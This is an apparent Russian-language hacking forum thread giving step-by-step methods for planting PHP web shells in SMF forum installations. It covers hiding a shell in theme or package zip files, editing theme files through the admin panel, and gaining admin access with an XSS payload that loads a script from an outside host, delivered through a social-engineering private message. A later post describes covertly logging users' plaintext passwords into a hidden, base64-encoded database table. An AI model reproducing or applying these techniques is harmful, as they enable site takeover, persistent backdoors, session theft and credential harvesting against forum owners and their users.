![]() |
Faq по Smf (Заливка шелла)!
Заливаем шелл в SMF
Если ты имеешь админский акк в этом форуме. Шаг_1 Зходим на форум под админом. Затем идем Код:
http://hacked.com/smf/index.php?action=adminШаг_2 На левой боковой вкладке выбираем [Themes and Layout].Внизу увидешь форму для upload тем для форума. Темы закачиваются в формате zip-архива. Шаг_3 Идем на официальный сайт форумного движка в раздел (mOds) Код:
http://custom.simplemachines.org/themes/Код:
http://custom.simplemachines.org/themes/index.php?lemma=66Код:
http://custom.simplemachines.org/themes/index.php?action=download;lemma=66;id=306Открываем zip с нашей темой и добавляем в архив свой php-shell--Пример директория /images/icons/myshell.php Шаг_5 Идем к форме [Install a New Theme] Добавляем наш архив-- From a file:blackTed.zip И даем название нашей теме-- Create a copy of Default named: HACK_THEME Жмем-- Install Если все прошло хорошо, то появиться надпись:blackTed was installed successfully. Шаг_6_Final Идем по ссылке(для случая с blackTed темой)-- Код:
http://hacked.com/smf/Themes/blackTed/icons/Fun_shell.php |
так и в джумлу мона залить.....
|
Способ 2. ЧЕРЕЗ аддоны(примочки)!
Механизм заключается в том, что залив происходит в папку Packages в виде BoardNews10.zip --пример Пихаем в архив в BoardNews10\Subs-BoardNews.php -- <? system("uname -a"); ?> Инсталлим и видем результат(при safemode:off и только если есть права на запись в Packages ) |
Сталкивался с проблемой, когда запись в папки запрещалась ... это легко решить !
Идём по адресу ../forum/index.php?action=theme;th=1;sesc=3d8eb20e38590c370 b19dba2e203d926;sa=edit;filename=index.php ну и спокойно правим в открывшемся окне индекс, точнее добавляем в него что то типа PHP код:
/forum/Themes/default/index.php?act=run :D Главное не суетитесь господа ... ******************************** Полный листинг индекса выглядит таким вот образом PHP код:
|
Это всё канешна весело если есть админка от форума, а если нет ? ...
Получить админку можно либо описанными (непомню в каком посте) способами, а можно немножко извратиться над этими способами и зделать нечто иное... Например щас я обрабатываю один из сайтикоф с многострадальным SMF 1.1.2 в дальнейшем siteX.ru. Вот что я проделал : На сайте имеется чат, в котором как опция присутствует онлайн радио, в скрипте которого я нашёл элементарную XSS такова вида http://siteX.ru/designes/radio.php?station=%22%20></OBJECT><script%20src=http://ааа.com/run.js></script><!-- Обнаружилось и то, что при попытки получить куки с помощью свойства document.cookie сайт выдавал куки не только чата , но и форума ;) Содержание run.js такое Код:
var s=document.createElement('script');листинг re.js (который запускаеца скриптом run.js) Код:
var shellCode = "<?php\n\n";Вопщем индекс будет в переменной shellCode (см. предыдущий пост) Едем дальше, думаю хватит мазать сопли по тарелке... Регим в форуме ник жэнской наружности :D и отправляем приват админу что то типо Танька, наши фотки со свадьбы я закинула в фотоархиф, у тя там такое эротичное платье ;) вот ссылка [U R L =http://siteX.ru/designes/radio.php?station=%22%3E%3C%2F%4F%42%4A%45%43%54%3 E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70% 3A%2F%2F%66%6F%72%65%73%74%2E%61%6C%66%61%6D%6F%6F %6E%2E%63%6F%6D%2F%72%75%6E%2E%6A%73%3E%3C%2F%73%6 3%72%69%70%74%3E%3C%21%2D%2D]http://photo-arhifff.xy/index.php?id=12548[/URL] Абратите ОСОБОЕ внимание на ссылку, даже если админ откроет её в новом окне он фсё равно фстрянет :cool: А любопытство как известно весч каварная... хоч не хоч а ткнуть придёца =) Итог ... идём по ссылке http://siteX.ru /forum/Themes/default/index.php?act=run и злобно начинаем БУГАГА ******************************** В этом методе есть два минуса: 1. Админ может что то заподозрить и не ткнуть на ссылу, а ваш ник получит бан =) 2.Если пхп сессия админа здохнет, хрен вам а не шелл, т к доступ в админку будет только по паролю, но при этом он спокойно может править свой профиль и отправлять мессаги ! *************************************** Инфа выложена чиста в азнакомительных целях, афтар не несёт ответственности за фсяких психов типо его самого, которые могут использовать эту инфу в западлянских целях ! EOF |
Здрасствуйте, сори за такой вопрос: а сам шел надо скопировать и сохранить в текстовом формате? или шел надо сохранить в специальном формате?...
|
Смотря на чем построен шелл. Чаще всего это php-скрипт.
|
Цитата:
Нужно для IPB и SMF)) |
Часто бывает так: шелл залили, доступ к БД получили, а хотелось бы получить пароли пользователей. Но вот беда пароли зашифрованные, да еще соленые, а сидеть и брутить их лень/нет времени/желания. Тогда сделаем так чтобы юзеры сами выкладывали нам свои пароли на блюдечке!
Местом хранения паролей выберем БД. Сразу скажу что те кто считают этот метод слишком палевным могут просто писать все в файл, но имхо БД предоставляет куда больше возможностей по обработке/сортировке этих данных. Сначала создадим таблицу куда будем складывать пароли Код:
CREATE TABLE smf_logs (Код:
...Код:
...Код:
...Код:
...По желанию можно закодировать данные в табличке, например функцией base64_encode(), так что даже если админ и случайно наткнется на нее, то ничего не поймет. А для расшифровки набросать свой маленький скрипт и оставить эго где-нибудь в глубине исходников форума |
залил все как надо через тему, адрес http://123xxx.ru/forum/Themes/blackted/icons/articles.php
выскакивает: Not Found The requested document was not found on this server. Web Server at 123xxx.ru |
Просто те надо было залить шелл внутри одного из файлов темы, а так твой файл из архива просто не попадает, вот и все)))) Просто код шелла вставь в любую страницу php файла темы!
|
Вот снял видео для новичков по заливке шелла, имея доступ в админку.
http://depositfiles.com/files/6759465 |
Нельзя, конечно.
|
1ce666 можно если присуствует уязв
к примеру уязвимость в версии SMF 1.1.6 Remote File Exect (как то так) |
Цитата:
В какую дирректорию можно залить??? есть предположения попытатся залить в attachments но просмотреть эту дирректорию невозможно Пррошу помощи и подскажите нормальный шелл для навигации по дирректориям как по FTP |
просто меняешь директорию загрузки тем и заливаешь ее в другую диру
у меня при устанокке тем пишет типо Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@cp874990.cpanel.tech-logol.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. права на выполнения php файлов выставлены что л и как то по другому? |
Цитата:
|
нет прав на запись в Themes/Packages, редактирования тем
тупик ? :( |
Нужно залить шелл на SMF.
Версия 2.0 RC1.2 Способ с заливкой файла / стиля выдаёт 404 NOT FOUND, но заливается и я могу даже редактировать файл стиля через админку. |
| Время: 02:20 |